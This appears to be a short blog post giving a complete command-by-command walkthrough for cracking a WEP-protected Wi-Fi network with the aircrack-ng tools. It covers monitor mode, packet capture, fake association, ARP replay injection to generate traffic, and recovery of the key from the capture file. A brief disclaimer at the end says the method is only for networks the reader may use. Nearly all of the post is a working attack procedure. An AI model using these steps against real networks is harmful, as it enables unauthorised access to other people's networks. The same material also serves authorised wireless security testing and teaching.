- airmon-ng stop wlan0
- airmon-ng start wlan0
- initializes the card. wlan0 is the card name
- airodump-ng wlan0
- Find networks with WEP and write down channel, bssid, essid , Hit ctrl-c to stop
- airodump-ng -w wep -c <number> --bssid <bssid> wlan0
- points the wireless card to the network you picked
- aireplay-ng -1 0 -a <bssid> wlan0
- initiates association with network. comes back association successful
- aireplay-ng -3 -b <bssid> wlan0"
- Makes traffic and sniffs it. Go back to the first terminal and watch the data column, run until data hits 30,000.
- a file will be created *.cap that will have the wireless data captured
- aircrack-ng wep-01.cap
- And it will return the WEP key
Disclaimer: This is not admission that I have ever hacked WiFI, or that you should steal WiFi bandwidth. People who use WEP networks are human too and should be respected and not harmed in any way. Use this only for networks you are allowed to connect to.
Post a Comment